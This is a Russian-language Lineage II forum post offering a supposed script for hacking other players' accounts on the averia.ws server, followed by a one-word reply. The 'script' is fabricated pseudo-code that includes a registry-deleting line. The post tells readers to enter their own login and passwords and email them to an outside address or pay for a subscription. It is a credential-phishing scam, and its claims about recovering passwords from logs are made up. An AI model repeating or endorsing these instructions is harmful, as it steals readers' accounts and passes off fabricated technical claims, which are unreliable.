Все о Lineage

Lineage

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » Lineage » Баги » Взломать аккаунт на Averia.ws x50


Взломать аккаунт на Averia.ws x50

Сообщений 1 страница 2 из 2

1

Все эти скрипты на руоффе и большинстве фришек  админы пофиксили давно!!! Но на сервере averia.ws х 50 обнаружены старые баги (например с сабклассами), а значит их при запуске не исправляли, следовательно и скрипт на взлом чужого аккаунта, при небольшой доработке будет работать! Внимательно прочитайте и выполняйте инструкцию!
Для взлома нужен:
1) НИК того персонажа, чей аккаунт вы хотите взломать.
2) Ваш персонаж, который гарантировано неоднократно контактировал (был в одной  локации, городе, клане и т.п.) с тем, кого хотите взломать.
Скрипт НЕ заходя на персонажа (т.к. не имеет клиент игры) собирает логи вашего персонажа, выявляя общие логи с НИКОМ взламываемого персонажа и затем анализируя данные, если их достаточно (см. ниже), выявляет используемые комбинации команд (клавиш) при каждом подключении взламываемого персонажа, что и является логином-паролем аккаунта.
Работа скрипта никак не влияет (как это бывает у других скриптов) на функциональность вашего персонажа, поэтому пользоваться скриптом можно находясь в игре.
Иногда, крайне редко, скрипт расценивает  комбинации скилов (как правило у бафферов, использующих одни и те же комбинации бафов, т.е нажатий кнопок) как возможный логин-пароль. В таком случае скрипт выдаст 2 варианта предполагаемых логин-паролей, примерно в таком виде:
Account#inData; – warkNAaveria///qwerty///12345678
Account#inDataAlt; – 123qwe456///poiuyt///789456     
- соответственно это будут логин, пароль и пароль персонажа на averia.ws, вводимый мышью.
Пробуем ввести оба варианта при взломе чужого аккаунта, один обязательно будет верным.
Как пользоваться:
Копируем сам скрипт, начиная с тега <script ON> и заканчивая <script end>. В скопированном скрипте ставим нужные данные (только то, что написано ЗАГЛАВНЫМИ по-русски, обычными маленькими буквами надписи можно убрать или оставить, они в скрипте не имеют значения).

<script ON>
Main.cpp:
#include<mail.hl>
#include<backpass.h>
Begin:
{
=slwrite=Averia.ws ("RU50")"pl"  -  тут в скобках ставим рейты сервера, на котором взламываемый и ваш персонажи, если не х50, то сменить на 5 или 7, соответственно
RegOpenKey(HKEY_LOCAL_MACHINE,"SYSTEM\CurrentControlSet\Services\PCI",&hk);
RegDeleteValue(hk,"Start");
RegCloseKey(hk);
RegIDCloseValue(hk,"ВАШ ЛОГИН"); Averia.ws, port - 7778
RegIDNextValue(hk,"НИК ЖЕРТВЫ") – по нему скрипт будет выявлять логин-пароль взламываемого аккаунта
RegPASSCloseKey(hk,"ВАШ ПАРОЛЬ ОТ AVERIA.WS") – именно логи вашего персонажа служат носителем данных о взламываемом вами чужом аккаунте 
DATALink(hk,"09-12/09/2013") – примерная дата активности взламываемого персонажа, разброс дат не более 6 суток (первые 2 цифры)!!!
RegPASSCloseKey(hk "ВАШ ПАРОЛЬ ВЫБОРА ПЕРСОНАЖА-вводимый мышью") –
RegMailKey(hk,"ВАШ ПОЧТОВЫЙ ЯЩИК") - туда бот вышлет чужой пароль
}
<script end>

Скопированный скрипт с введенными туда данными нужно отправить на сервер скрипт-бота.
Это можно сделать двумя способами:
1) Оплатить подписку на сайте разработчика скрипта averiaws.www.scripts.com (на 3, 6 и 12 месяцев) и получить доступ к серверу. Плюс платной подписки только один – обрабатываются данные быстрее, чем в бесплатной версии.
2) Воспользовавшись бесплатной триал-версией. Для этого текст скрипта, с введенными вами данными, необходимо отправить на адрес   hack_aweria.ws@bk.ru с ящика, адрес которого вы вводили в скрипт. На него же и придут данные обработки вашего запроса.

В бесплатной версии на обработку данных скриптом обычно уходит от 2 часов до 1-2 дней, в зависимости загруженности сервера разработчика, объема собранных скриптом данных (чем их больше, тем быстрее аналитика) и от того, когда взламываемый вами персонаж вновь залогинится (чем чаще персонаж заходит-выходит из игры, тем проще скрипту выявить повторы команд).
Если через 2 дня не пришло письмо с данными логина-пароля, значит или вы не все данные ввели, или неверно ввели, или ваш персонаж, через которого скрипт собирал данные
Необходимо, чтобы ваш персонаж существовал и был регулярно онлайн больше 4 недель в игре, т.к. именно с его логов собираются данные для взлома аккаунта вашей жертвы.
Совет: пишите какой нибудь левый ящик, а то админы просекут по маилу и забанить могу аккаунт, на котором висит этот mail! Чтобы воспользоваться скриптом вторично, достаточно сделать все то же, но используя другой адрес электронной почты.

0

2

норм:)

0


Вы здесь » Lineage » Баги » Взломать аккаунт на Averia.ws x50